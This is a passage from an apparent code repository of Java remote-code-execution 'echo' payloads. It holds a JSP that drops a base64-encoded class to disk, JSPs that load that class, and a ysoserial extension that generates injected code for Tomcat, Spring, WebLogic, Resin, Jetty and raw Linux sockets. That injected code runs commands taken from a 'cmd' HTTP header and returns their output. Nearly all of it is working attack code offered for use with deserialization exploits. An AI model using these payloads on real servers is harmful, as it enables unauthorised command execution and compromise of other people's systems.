16 | String content = "yv66vgAAADQAqgcAAgEAA1BvQwcABAEAEGphdmEvbGFuZy9PYmplY3QBAAFoAQATTGphdmEvdXRpbC9IYXNoU2V0OwEACVNpZ25hdHVyZQEAJ0xqYXZhL3V0aWwvSGFzaFNldDxMamF2YS9sYW5nL09iamVjdDs+OwEAAXIBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAFwAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEABjxpbml0PgEAAygpVgEABENvZGUKAAMAEQwADQAOCQABABMMAAkACgkAAQAVDAALAAwHABcBABFqYXZhL3V0aWwvSGFzaFNldAoAFgARCQABABoMAAUABgoAHAAeBwAdAQAQamF2YS9sYW5nL1RocmVhZAwAHwAgAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7CgABACIMACMAJAEAAUYBABYoTGphdmEvbGFuZy9PYmplY3Q7SSlWAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABUxQb0M7AQABaQEAFShMamF2YS9sYW5nL09iamVjdDspWgoAFgAsDAAtACoBAAhjb250YWlucwoAFgAvDAAwACoBAANhZGQBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAA1TdGFja01hcFRhYmxlCgABADUMACkAKgcANwEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QKAAMAOQwAOgA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7CgA9AD8HAD4BAA9qYXZhL2xhbmcvQ2xhc3MMAEAAQQEAEGlzQXNzaWduYWJsZUZyb20BABQoTGphdmEvbGFuZy9DbGFzczspWggAQwEAA2NtZAsANgBFDABGAEcBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwgASQEAC2dldFJlc3BvbnNlCgA9AEsMAEwATQEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsKAE8AUQcAUAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAwAUgBTAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7BwBVAQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2ULAFQAVwwAWABZAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsHAFsBABFqYXZhL3V0aWwvU2Nhbm5lcgoAXQBfBwBeAQARamF2YS9sYW5nL1J1bnRpbWUMAGAAYQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsKAF0AYwwAZABlAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwoAZwBpBwBoAQARamF2YS9sYW5nL1Byb2Nlc3MMAGoAawEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsKAFoAbQwADQBuAQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWCABwAQACXEEKAFoAcgwAcwB0AQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7CgBaAHYMAHcAeAEABG5leHQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwoAegB8BwB7AQATamF2YS9pby9QcmludFdyaXRlcgwAfQB+AQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgoAegCADACBAA4BAAVmbHVzaAcAgwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAFvAQAFZGVwdGgBAAFJCgA9AIgMAIkAigEAEWdldERlY2xhcmVkRmllbGRzAQAcKClbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwoAjACOBwCNAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQMAI8AkAEADXNldEFjY2Vzc2libGUBAAQoWilWCgCMAJIMAJMAlAEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7CgA9AJYMAJcAmAEAB2lzQXJyYXkBAAMoKVoKAAEAmgwACwAkBwCcAQATW0xqYXZhL2xhbmcvT2JqZWN0OwoAPQCeDACfADsBAA1nZXRTdXBlcmNsYXNzAQAFc3RhcnQBAAFuAQARTGphdmEvbGFuZy9DbGFzczsBAA1kZWNsYXJlZEZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAAXEHAKcBABpbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAClNvdXJjZUZpbGUBAAhQb0MuamF2YQAhAAEAAwAAAAMACAAFAAYAAQAHAAAAAgAIAAgACQAKAAAACAALAAwAAAAEAAEADQAOAAEADwAAAFwAAgABAAAAHiq3ABABswASAbMAFLsAFlm3ABizABm4ABsDuAAhsQAAAAIAJQAAABoABgAAAAwABAANAAgADgAMAA8AFgAQAB0AEQAmAAAADAABAAAAHgAnACgAAAAKACkAKgABAA8AAABWAAIAAQAAABoqxgANsgAZKrYAK5kABQSssgAZKrYALlcDrAAAAAMAJQAAAA4AAwAAABQAEAAWABgAFwAmAAAADAABAAAAGgAxADIAAAAzAAAABAACDgEACgALACQAAQAPAAABYAAGAAIAAAC/GxA0owAPsgASxgAKsgAUxgAEsSq4ADSaAKeyABLHAFESNiq2ADi2ADyZAEUqwAA2swASsgASEkK5AEQCAMcACgGzABKnACqyABK2ADgSSAO9AD22AEqyABIDvQADtgBOwABUswAUpwAIVwGzABKyABLGAEayABTGAECyABS5AFYBALsAWlm4AFyyABISQrkARAIAtgBitgBmtwBsEm+2AHG2AHW2AHmyABS5AFYBALYAf6cABFexKhsEYLgAIbEAAgBHAGYAaQCCAHoAsgC1AIIAAwAlAAAASgASAAAAGwASABwAEwAeABoAHwAsACAAMwAhAEAAIgBEACMARwAlAGYAJgBqACcAbgAsAHoALgCnAC8AsgAwALYAMgC3ADUAvgA3ACYAAAAWAAIAAAC/AIQAMgAAAAAAvwCFAIYAAQAzAAAAEwAJEgAzYQcAggT3AEYHAIIAAAYACgAjACQAAQAPAAABpgACAAwAAAB+KrYAOE0stgCHWToGvjYFAzYEpwBbGQYVBDJOLQS2AIsBOgctKrYAkToHGQe2ADi2AJWaAAwZBxu4AJmnAC8ZB8AAm1k6C742CgM2CacAExkLFQkyOggZCBu4AJmECQEVCRUKof/spwAEV4QEARUEFQWh/6QstgCdWU3H/4uxAAEAIwBmAGkAggADACUAAAA+AA8AAAA5AAUAOwAbADwAIAA9ACMAPwAqAEEANQBCADsAQwA+AEQAVgBFAFwARABmAEkAagA7AHQATAB9AE0AJgAAAD4ABgAAAH4AoAAyAAAAAAB+AIUAhgABAAUAeQChAKIAAgAbAE8AowCkAAMAIwBHAIQAMgAHAFYABgClADIACAAzAAAAhgAI/AAFBwA9/wAPAAcHAAMBBwA9AAEBBwCmAAD/ACgACAcAAwEHAD0HAIwBAQcApgcAAwAA/wAQAAwHAAMBBwA9BwCMAQEHAKYHAAMAAQEHAJsAAA//AAkACAcAAwEHAD0HAIwBAQcApgcAAwABBwCC/wAAAAcHAAMBBwA9AAEBBwCmAAACAAEAqAAAAAIAqQ==";
17 | byte[] bytes = java.util.Base64.getDecoder().decode(content);
18 | os.write(bytes);
19 | os.close();
20 |
21 | }catch (Exception e){
22 | e.printStackTrace();
23 | }
24 | %>
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/code/Step2-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | Class.forName("PoC").newInstance();
4 | %>
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/code/Step2.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | java.net.URL url;
4 | if (java.io.File.separator.equals("/")) {
5 | url = new java.net.URL("file:///tmp/");
6 | }else{
7 | url = new java.net.URL("file:///c:/windows/temp/");
8 | }
9 | java.net.URLClassLoader urlClassLoader = new java.net.URLClassLoader(new java.net.URL[]{url}, Thread.currentThread().getContextClassLoader());
10 | urlClassLoader.loadClass("PoC").newInstance();
11 | %>
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/img/step1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/全自动挖掘 request 回显/img/step1.png
--------------------------------------------------------------------------------
/全自动挖掘 request 回显/img/step2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/全自动挖掘 request 回显/img/step2.png
--------------------------------------------------------------------------------
/写文件/README.md:
--------------------------------------------------------------------------------
1 | # 写文件回显
2 | ## 效果
3 | 
4 | 
5 |
--------------------------------------------------------------------------------
/写文件/code/writeFile.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | String path = Thread.currentThread().getContextClassLoader().getResource("").getPath();
4 | path = path.substring(0, path.indexOf("WEB-INF"));
5 | String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!\"").getInputStream()).useDelimiter("\\A").next();
6 | java.io.PrintWriter printWriter = new java.io.PrintWriter(path + "echo.js");
7 | printWriter.println(res);
8 | printWriter.close();
9 | %>
--------------------------------------------------------------------------------
/写文件/img/001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/写文件/img/001.png
--------------------------------------------------------------------------------
/写文件/img/002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/写文件/img/002.png
--------------------------------------------------------------------------------
/集成到ysoserial/DirectiveProcessor.java:
--------------------------------------------------------------------------------
1 | package ysoserial.my;
2 |
3 | import java.io.*;
4 | import java.util.Arrays;
5 | import sun.misc.BASE64Decoder;
6 | import sun.misc.BASE64Encoder;
7 |
8 | public class DirectiveProcessor{
9 | public static void main(String[] args) throws IOException {
10 | System.out.println(process("directive:WindowsEcho:whoami"));
11 | }
12 |
13 | public static String process(String command){
14 | if(command == null || command.trim().equals("")){
15 | return "";
16 | }
17 |
18 |
19 | // LinuxEcho("LinuxEcho"),
20 | // WindowsEcho("WindowsEcho"),
21 | // SpringEcho1("SpringEcho1"),
22 | // SpringEcho2("SpringEcho2"),
23 | // TomcatEcho("TomcatEcho"),
24 | // WeblogicEcho1("WeblogicEcho1"),
25 | // WeblogicEcho2("WeblogicEcho2"),
26 | // ResinEcho("ResinEcho"),
27 | // JettyEcho("JettyEcho"),
28 | // AutoFindRequestEcho("AutoFindRequestEcho"),
29 | // WriteFileEcho("WriteFileEcho");
30 |
31 | command = command.trim();
32 | if(command.startsWith("directive:sleep")){
33 | long time = Long.parseLong(command.split(":", 3)[2]);
34 | return sleep(time);
35 | }else if(command.startsWith("directive:LinuxEcho")){
36 | return linuxEcho(command);
37 | }else if(command.startsWith("directive:WindowsEcho")){
38 | return windowsEcho(command);
39 | }else if(command.startsWith("directive:SpringEcho1")){
40 | return springEcho1();
41 | }else if(command.startsWith("directive:SpringEcho2")){
42 | return springEcho2();
43 | }else if(command.startsWith("directive:TomcatEcho")){
44 | return tomcatEcho();
45 | }else if(command.startsWith("directive:WeblogicEcho1")){
46 | return weblogicEcho1();
47 | }else if(command.startsWith("directive:WeblogicEcho2")){
48 | return weblogicEcho2(command);
49 | }else if(command.startsWith("directive:ResinEcho")){
50 | return resinEcho();
51 | }else if(command.startsWith("directive:JettyEcho")){
52 | return jettyEcho();
53 | }else if(command.startsWith("directive:AutoFindRequestEcho")){
54 | return autoFindRequestEcho();
55 | }else if(command.startsWith("directive:WriteFileEcho")){
56 | return wirteFileEcho(command);
57 | }else if(command.startsWith("directive:WriteClass")){
58 | return writeClass(Integer.parseInt(command.split(":",3)[2]));
59 | } else if(command.startsWith("directive:Shell")){
60 | return shell(command);
61 | }else{
62 | return "java.lang.Runtime.getRuntime().exec(\"" +
63 | command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
64 | "\");";
65 | }
66 | }
67 |
68 | public static String sleep(long seconds){
69 | long time = seconds * 1000;
70 | String code = "java.lang.Thread.sleep((long)" + time + ");";
71 | return code;
72 | }
73 |
74 | public static String linuxEcho(String command){
75 | String cmd = command.split(":", 3)[2];
76 | cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"");
77 |
78 | String code = " if(java.io.File.separator.equals(\"/\")){\n" +
79 | " String command = \"ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\\\"[\\\"}''{print $2}'|sed 's/.$//'\";\n" +
80 | " String[] cmd = new String[]{\"/bin/sh\", \"-c\", command};\n" +
81 | " java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" +
82 | " java.util.List res1 = new java.util.ArrayList();\n" +
83 | " String line = \"\";\n" +
84 | " while ((line = br.readLine()) != null && !line.trim().isEmpty()){\n" +
85 | " res1.add(line);\n" +
86 | " }\n" +
87 | " br.close();\n" +
88 | "\n" +
89 | " try {\n" +
90 | " Thread.sleep((long)2000);\n" +
91 | " } catch (InterruptedException e) {\n" +
92 | " //pass\n" +
93 | " }\n" +
94 | "\n" +
95 | " command = \"ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'\";\n" +
96 | " cmd = new String[]{\"/bin/sh\", \"-c\", command};\n" +
97 | " br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" +
98 | " java.util.List res2 = new java.util.ArrayList();\n" +
99 | " while ((line = br.readLine()) != null && !line.trim().isEmpty()){\n" +
100 | " res2.add(line);\n" +
101 | " }\n" +
102 | " br.close();\n" +
103 | "\n" +
104 | " int index = 0;\n" +
105 | " int max = 0;\n" +
106 | " for(int i = 0; i < res2.size(); i++){\n" +
107 | " try{\n" +
108 | " String socketNo = ((String)res2.get(i)).split(\"\\\\s+\")[1].substring(8);\n" +
109 | " socketNo = socketNo.substring(0, socketNo.length() - 1);\n" +
110 | " for(int j = 0; j < res1.size(); j++){\n" +
111 | " if(!socketNo.equals(res1.get(j))) continue;\n" +
112 | "\n" +
113 | " if(Integer.parseInt(socketNo) > max) {\n" +
114 | " max = Integer.parseInt(socketNo);\n" +
115 | " index = j;\n" +
116 | " }\n" +
117 | " break;\n" +
118 | " }\n" +
119 | " }catch(Exception e){\n" +
120 | " //pass\n" +
121 | " }\n" +
122 | " }\n" +
123 | "\n" +
124 | " int fd = Integer.parseInt(((String)res2.get(index)).split(\"\\\\s\")[0]);\n" +
125 | " java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});\n" +
126 | " c.setAccessible(true);\n" +
127 | " cmd = new String[]{\"/bin/sh\", \"-c\", \"" + cmd + "\"};\n" +
128 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" +
129 | " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + res.length() + \"\\n\\n\" + res + \"\\n\";\n" +
130 | " java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));\n" +
131 | " os.write(result.getBytes());\n" +
132 | " }";
133 |
134 | return code;
135 | }
136 |
137 | public static String springEcho1(){
138 | String code = " java.lang.reflect.Method method = Class.forName(\"org.springframework.web.context.request.RequestContextHolder\").getMethod(\"getRequestAttributes\", null);\n" +
139 | " Object requestAttributes = method.invoke(null,null);\n" +
140 | "\n" +
141 | " method = requestAttributes.getClass().getMethod(\"getRequest\", null);\n" +
142 | " Object request = method.invoke(requestAttributes , null);\n" +
143 | "\n" +
144 | " method = request.getClass().getMethod(\"getHeader\", new Class[]{String.class});\n" +
145 | " String cmd = (String) method.invoke(request, new Object[]{\"cmd\"});\n" +
146 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" +
147 | "\n" +
148 | " method = requestAttributes.getClass().getMethod(\"getResponse\", null);\n" +
149 | " Object response = method.invoke(requestAttributes , null);\n" +
150 | "\n" +
151 | " method = response.getClass().getMethod(\"getWriter\", null);\n" +
152 | " java.io.PrintWriter printWriter = (java.io.PrintWriter) method.invoke(response, null);\n" +
153 | " printWriter.println(res);";
154 |
155 | return code;
156 | }
157 |
158 | public static String springEcho2(){
159 | String code = "java.lang.reflect.Method method = Class.forName(\"org.springframework.webflow.context.ExternalContextHolder\").getMethod(\"getExternalContext\", null);\n" +
160 | " Object servletExternalContext = method.invoke(null,null);\n" +
161 | "\n" +
162 | " method = servletExternalContext.getClass().getMethod(\"getNativeRequest\", null);\n" +
163 | " Object request = method.invoke(servletExternalContext , null);\n" +
164 | "\n" +
165 | " method = request.getClass().getMethod(\"getHeader\", new Class[]{String.class});\n" +
166 | " String cmd = (String) method.invoke(request, new Object[]{\"cmd\"});\n" +
167 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" +
168 | "\n" +
169 | " method = servletExternalContext.getClass().getMethod(\"getNativeResponse\", null);\n" +
170 | " Object response = method.invoke(servletExternalContext , null);\n" +
171 | "\n" +
172 | " method = response.getClass().getMethod(\"getWriter\", null);\n" +
173 | " java.io.PrintWriter printWriter = (java.io.PrintWriter) method.invoke(response, null);\n" +
174 | " printWriter.println(res);";
175 |
176 | return code;
177 | }
178 |
179 | public static String tomcatEcho(){
180 | String code = " boolean flag = false;\n" +
181 | " ThreadGroup group = Thread.currentThread().getThreadGroup();\n" +
182 | " java.lang.reflect.Field f = group.getClass().getDeclaredField(\"threads\");\n" +
183 | " f.setAccessible(true);\n" +
184 | " Thread[] threads = (Thread[]) f.get(group);\n" +
185 | "\n" +
186 | " for(int i = 0; i < threads.length; i++) {\n" +
187 | " try{\n" +
188 | " Thread t = threads[i];\n" +
189 | " if (t == null) continue;\n" +
190 | "\n" +
191 | " String str = t.getName();\n" +
192 | " if (str.contains(\"exec\") || !str.contains(\"http\")) continue;\n" +
193 | "\n" +
194 | "\n" +
195 | " f = t.getClass().getDeclaredField(\"target\");\n" +
196 | " f.setAccessible(true);\n" +
197 | " Object obj = f.get(t);\n" +
198 | "\n" +
199 | " if (!(obj instanceof Runnable)) continue;\n" +
200 | "\n" +
201 | " f = obj.getClass().getDeclaredField(\"this$0\");\n" +
202 | " f.setAccessible(true);\n" +
203 | " obj = f.get(obj);\n" +
204 | "\n" +
205 | " try{\n" +
206 | " f = obj.getClass().getDeclaredField(\"handler\");\n" +
207 | " }catch (NoSuchFieldException e){\n" +
208 | " f = obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\");\n" +
209 | " }\n" +
210 | " f.setAccessible(true);\n" +
211 | " obj = f.get(obj);\n" +
212 | "\n" +
213 | " try{\n" +
214 | " f = obj.getClass().getSuperclass().getDeclaredField(\"global\");\n" +
215 | " }catch(NoSuchFieldException e){\n" +
216 | " f = obj.getClass().getDeclaredField(\"global\");\n" +
217 | " }\n" +
218 | " f.setAccessible(true);\n" +
219 | " obj = f.get(obj);\n" +
220 | "\n" +
221 | " f = obj.getClass().getDeclaredField(\"processors\");\n" +
222 | " f.setAccessible(true);\n" +
223 | " java.util.List processors = (java.util.List)(f.get(obj));\n" +
224 | "\n" +
225 | " for(int j = 0; j < processors.size(); ++j) {\n" +
226 | " Object processor = processors.get(j);\n" +
227 | " f = processor.getClass().getDeclaredField(\"req\");\n" +
228 | " f.setAccessible(true);\n" +
229 | " Object req = f.get(processor);\n" +
230 | " Object resp = req.getClass().getMethod(\"getResponse\", new Class[0]).invoke(req, new Object[0]);\n" +
231 | "\n" +
232 | " str = (String)req.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(req, new Object[]{\"cmd\"});\n" +
233 | "\n" +
234 | " if (str != null && !str.isEmpty()) {\n" +
235 | " resp.getClass().getMethod(\"setStatus\", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});\n" +
236 | " String[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", str} : new String[]{\"/bin/sh\", \"-c\", str};\n" +
237 | " byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes();\n" +
238 | "\n" +
239 | " try {\n" +
240 | " Class cls = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" +
241 | " obj = cls.newInstance();\n" +
242 | " cls.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});\n" +
243 | " resp.getClass().getMethod(\"doWrite\", new Class[]{cls}).invoke(resp, new Object[]{obj});\n" +
244 | " } catch (NoSuchMethodException var5) {\n" +
245 | " Class cls = Class.forName(\"java.nio.ByteBuffer\");\n" +
246 | " obj = cls.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(cls, new Object[]{result});\n" +
247 | " resp.getClass().getMethod(\"doWrite\", new Class[]{cls}).invoke(resp, new Object[]{obj});\n" +
248 | " }\n" +
249 | "\n" +
250 | " flag = true;\n" +
251 | " }\n" +
252 | "\n" +
253 | " if (flag) break;\n" +
254 | " }\n" +
255 | "\n" +
256 | " if (flag) break;\n" +
257 | " }catch(Exception e){\n" +
258 | " continue;\n" +
259 | " }\n" +
260 | " }";
261 |
262 | return code;
263 | }
264 |
265 | public static String weblogicEcho1(){
266 | String code = " Object obj = Thread.currentThread().getClass().getMethod(\"getCurrentWork\", null).invoke(Thread.currentThread(), null);\n" +
267 | " String cmd = (String) obj.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(obj, new Object[]{\"cmd\"});\n" +
268 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" +
269 | " Object r = obj.getClass().getMethod(\"getResponse\", null).invoke(obj, null);\n" +
270 | " Object os = r.getClass().getMethod(\"getServletOutputStream\", null).invoke(r, null);\n" +
271 | " obj = Class.forName(\"weblogic.xml.util.StringInputStream\").getConstructor(new Class[]{String.class}).newInstance(new Object[]{res});\n" +
272 | "\n" +
273 | " os.getClass().getMethod(\"writeStream\", new Class[]{Class.forName(\"java.io.InputStream\")}).invoke(os, new Object[]{obj});\n" +
274 | " os.getClass().getMethod(\"flush\", null).invoke(os, null);\n" +
275 | " obj = r.getClass().getMethod(\"getWriter\", null).invoke(r, null);\n" +
276 | " obj.getClass().getMethod(\"write\", new Class[]{String.class}).invoke(obj, new Object[]{\"\"});";
277 |
278 | return code;
279 | }
280 |
281 | public static String weblogicEcho2(String command){
282 | String cmd = command.split(":", 3)[2];
283 | cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"");
284 |
285 | String code = "Object obj = Thread.currentThread().getClass().getMethod(\"getCurrentWork\", null).invoke(Thread.currentThread(), null);\n" +
286 | " Field field = obj.getClass().getDeclaredField(\"connectionHandler\");\n" +
287 | " field.setAccessible(true);\n" +
288 | " obj = field.get(obj);\n" +
289 | " String cmd = \"" + cmd + "\";\n" +
290 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" +
291 | "\n" +
292 | " Object r = obj.getClass().getMethod(\"getServletRequest\", null).invoke(obj, null);\n" +
293 | " Object o = r.getClass().getMethod(\"getResponse\", null).invoke(r, null);\n" +
294 | " Object s = o.getClass().getMethod(\"getServletOutputStream\", null).invoke(o, null);\n" +
295 | "\n" +
296 | " obj = Class.forName(\"weblogic.xml.util.StringInputStream\").getConstructor(new Class[]{String.class}).newInstance(new Object[]{res});\n" +
297 | "\n" +
298 | " s.getClass().getMethod(\"writeStream\", new Class[]{Class.forName(\"java.io.InputStream\")}).invoke(s, new Object[]{obj});\n" +
299 | " s.getClass().getMethod(\"flush\", null).invoke(s, null);\n" +
300 | " obj = o.getClass().getMethod(\"getWriter\", null).invoke(o, null);\n" +
301 | " obj.getClass().getMethod(\"write\", new Class[]{String.class}).invoke(obj, new Object[]{\"\"});";
302 |
303 | return code;
304 | }
305 |
306 | public static String resinEcho(){
307 | String code = " Class clazz = Thread.currentThread().getClass();\n" +
308 | " java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField(\"threadLocals\");\n" +
309 | " field.setAccessible(true);\n" +
310 | " Object obj = field.get(Thread.currentThread());\n" +
311 | "\n" +
312 | " field = obj.getClass().getDeclaredField(\"table\");\n" +
313 | " field.setAccessible(true);\n" +
314 | " obj = field.get(obj);\n" +
315 | "\n" +
316 | " Object[] obj_arr = (Object[]) obj;\n" +
317 | " for(int i = 0; i < obj_arr.length; i++) {\n" +
318 | " Object o = obj_arr[i];\n" +
319 | " if (o == null) continue;\n" +
320 | "\n" +
321 | " field = o.getClass().getDeclaredField(\"value\");\n" +
322 | " field.setAccessible(true);\n" +
323 | " obj = field.get(o);\n" +
324 | "\n" +
325 | " if(obj != null && obj.getClass().getName().equals(\"com.caucho.server.http.HttpRequest\")){\n" +
326 | " com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj;\n" +
327 | " String cmd = httpRequest.getHeader(\"cmd\");\n" +
328 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" +
329 | " com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();\n" +
330 | " httpResponse.setHeader(\"Content-Length\", res.length() + \"\");\n" +
331 | " java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod(\"createResponseStream\", null);\n" +
332 | " method.setAccessible(true);\n" +
333 | " com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);\n" +
334 | " httpResponseStream.write(res.getBytes(), 0, res.length());\n" +
335 | " httpResponseStream.close();\n" +
336 | " }\n" +
337 | " }";
338 |
339 | return code;
340 | }
341 |
342 | public static String jettyEcho(){
343 | String code = " Class clazz = Thread.currentThread().getClass();\n" +
344 | " java.lang.reflect.Field field = clazz.getDeclaredField(\"threadLocals\");\n" +
345 | " field.setAccessible(true);\n" +
346 | " Object obj = field.get(Thread.currentThread());\n" +
347 | "\n" +
348 | " field = obj.getClass().getDeclaredField(\"table\");\n" +
349 | " field.setAccessible(true);\n" +
350 | " obj = field.get(obj);\n" +
351 | "\n" +
352 | " Object[] obj_arr = (Object[]) obj;\n" +
353 | " for(int i = 0; i < obj_arr.length; i++){\n" +
354 | " Object o = obj_arr[i];\n" +
355 | " if(o == null) continue;\n" +
356 | "\n" +
357 | " field = o.getClass().getDeclaredField(\"value\");\n" +
358 | " field.setAccessible(true);\n" +
359 | " obj = field.get(o);\n" +
360 | "\n" +
361 | " if(obj != null && obj.getClass().getName().endsWith(\"AsyncHttpConnection\")){\n" +
362 | " Object connection = obj;\n" +
363 | " java.lang.reflect.Method method = connection.getClass().getMethod(\"getRequest\", null);\n" +
364 | " obj = method.invoke(connection, null);\n" +
365 | "\n" +
366 | " method = obj.getClass().getMethod(\"getHeader\", new Class[]{String.class});\n" +
367 | " obj = method.invoke(obj, new Object[]{\"cmd\"});\n" +
368 | "\n" +
369 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter(\"\\\\A\").next();\n" +
370 | "\n" +
371 | " method = connection.getClass().getMethod(\"getPrintWriter\", new Class[]{String.class});\n" +
372 | " java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{\"utf-8\"});\n" +
373 | " printWriter.println(res);\n" +
374 | "\n" +
375 | " }else if(obj != null && obj.getClass().getName().endsWith(\"HttpConnection\")){\n" +
376 | " java.lang.reflect.Method method = obj.getClass().getDeclaredMethod(\"getHttpChannel\", null);\n" +
377 | " Object httpChannel = method.invoke(obj, null);\n" +
378 | "\n" +
379 | " method = httpChannel.getClass().getMethod(\"getRequest\", null);\n" +
380 | " obj = method.invoke(httpChannel, null);\n" +
381 | "\n" +
382 | " method = obj.getClass().getMethod(\"getHeader\", new Class[]{String.class});\n" +
383 | " obj = method.invoke(obj, new Object[]{\"cmd\"});\n" +
384 | "\n" +
385 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter(\"\\\\A\").next();\n" +
386 | "\n" +
387 | " method = httpChannel.getClass().getMethod(\"getResponse\", null);\n" +
388 | " obj = method.invoke(httpChannel, null);\n" +
389 | "\n" +
390 | " method = obj.getClass().getMethod(\"getWriter\", null);\n" +
391 | " java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);\n" +
392 | " printWriter.println(res);\n" +
393 | " }\n" +
394 | " }";
395 |
396 | return code;
397 | }
398 |
399 | public static String windowsEcho(String command){
400 | String cmd = command.split(":", 3)[2];
401 | cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"");
402 |
